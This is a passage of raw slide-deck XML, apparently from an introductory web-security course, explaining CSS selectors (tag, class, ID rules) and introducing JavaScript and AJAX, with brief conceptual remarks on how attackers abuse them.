            <a:ext cx="0" cy="33993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pic>
        <p:nvPicPr>
          <p:cNvPr id="1314" name="Google Shape;1314;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255950" y="1345575"/>
            <a:ext cx="2221350" cy="3418675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5311100" y="1287351"/>
            <a:ext cx="2221349" cy="3418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81"/>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rPr>
              <a:t>CSS rules change the appearance of web pages by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>targeting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> elements using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1321" name="Google Shape;1321;p81"/>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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The most basic CSS rules are defined with:</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tag name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, followed by curly braces</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS properties/rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, within the curly braces</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="Google Shape;1322;p81"/>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CSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a Tag Rule</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Google Shape;1323;p8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4" name="Google Shape;1324;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742788" y="2362213"/>
            <a:ext cx="6172200" cy="25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Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>h3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> {</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	 font-size: 24-px;</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	 color: tomato;</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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	}</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1325" name="Google Shape;1325;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148738" y="1462575"/>
            <a:ext cx="2274600" cy="6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Tag Name</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1326" name="Google Shape;1326;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="1938338" y="1448100"/>
            <a:ext cx="695400" cy="1434300"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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1327" name="Google Shape;1327;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="988513" y="2927250"/>
            <a:ext cx="667500" cy="1288800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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1328" name="Google Shape;1328;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32313" y="3187350"/>
            <a:ext cx="9561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CSS Rules</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5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 to the WWWeb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;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sp>
        <p:nvSpPr>
          <p:cNvPr id="1333" name="Google Shape;1333;p82"/>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rPr>
              <a:t>You can also define </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which allow us to apply the same styles to any element with the class</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1334" name="Google Shape;1334;p82"/>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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class rules are defined with a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), followed by the class name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We can apply this to an HTML element by setting its `class` attribute equal to `subtitle`.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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1335" name="Google Shape;1335;p82"/>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CSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a Class Rule</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1336" name="Google Shape;1336;p8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7" name="Google Shape;1337;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742798" y="2352250"/>
            <a:ext cx="5226600" cy="25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Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>.subtitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> {</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	 font-size: 24-px;</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	 color: tomato;</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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	}</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1338" name="Google Shape;1338;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698988" y="1427363"/>
            <a:ext cx="2274600" cy="6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Class Name</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2488588" y="1206625"/>
            <a:ext cx="695400" cy="1926300"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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1340" name="Google Shape;1340;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="988513" y="2917275"/>
            <a:ext cx="667500" cy="1288800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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1341" name="Google Shape;1341;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32313" y="3177375"/>
            <a:ext cx="9561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CSS Rules</a:t>
            </a:r>
            <a:endParaRPr sz="18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83"/>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rPr>
              <a:t>CSS can also be identified by using IDs</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1347" name="Google Shape;1347;p83"/>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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs are  often used by developers and attackers alike to extract or insert information into specific areas of a page.</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p83"/>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CSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of an ID Rule</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Google Shape;1349;p8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0" name="Google Shape;1350;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556468" y="2352250"/>
            <a:ext cx="5499900" cy="25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Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>#subtitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> {</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	 font-size: 24-px;</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	 color: tomato;</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1517439" y="1427375"/>
            <a:ext cx="2026800" cy="6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ID Name</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1352" name="Google Shape;1352;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2373375" y="1346750"/>
            <a:ext cx="695400" cy="1646100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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8761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1353" name="Google Shape;1353;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="884246" y="2917288"/>
            <a:ext cx="594900" cy="1288800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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1354" name="Google Shape;1354;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32324" y="3177388"/>
            <a:ext cx="852000" cy="10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CSS Rules</a:t>
            </a:r>
            <a:endParaRPr sz="18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sp>
        <p:nvSpPr>
          <p:cNvPr id="1360" name="Google Shape;1360;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JavaScript (JS) is the programming language used by browsers to add “life” and interactivity to web pages. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1361" name="Google Shape;1361;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2" name="Google Shape;1362;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="7302300" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>JavaScript is used for the following tasks:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>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 Adding interactivity to web pages</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>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Send data to/from the network from the browser</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">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Facilitating data transfers between clients/servers</a:t>
            </a:r>
            <a:endParaRPr>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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>JS also provides one of the most significant security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>liabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> web pages face: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>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In order to add interactivity to web pages, JS has to be able to change the page's HTML in response to user actions.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This allows attackers to update web pages with malicious content after they've been loaded.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1363" name="Google Shape;1363;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823551" y="1418375"/>
            <a:ext cx="1998601" cy="27996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Asynchronous Javascript and XML (AJAX)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1369" name="Google Shape;1369;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solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>AJAX allows web applications to send and request data from servers on the web, used on legitimate sites like BuzzFeed to load </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>more and more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> content as users scroll down the page (“infinite scroll”).</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>This feature also allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>attackers to read sensitive data from a user’s browser, and send it to their own malicious server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> (data exfiltration via AJAX).</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1370" name="Google Shape;1370;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71" name="Google Shape;1371;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045975" y="1914148"/>
            <a:ext cx="1046492" cy="1364392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559387" y="3971803"/>
            <a:ext cx="1110620" cy="944845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1373" name="Google Shape;1373;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473994" y="3971803"/>
            <a:ext cx="1110620" cy="944845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1374" name="Google Shape;1374;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1736330">
            <a:off x="2260210" y="3046932"/>
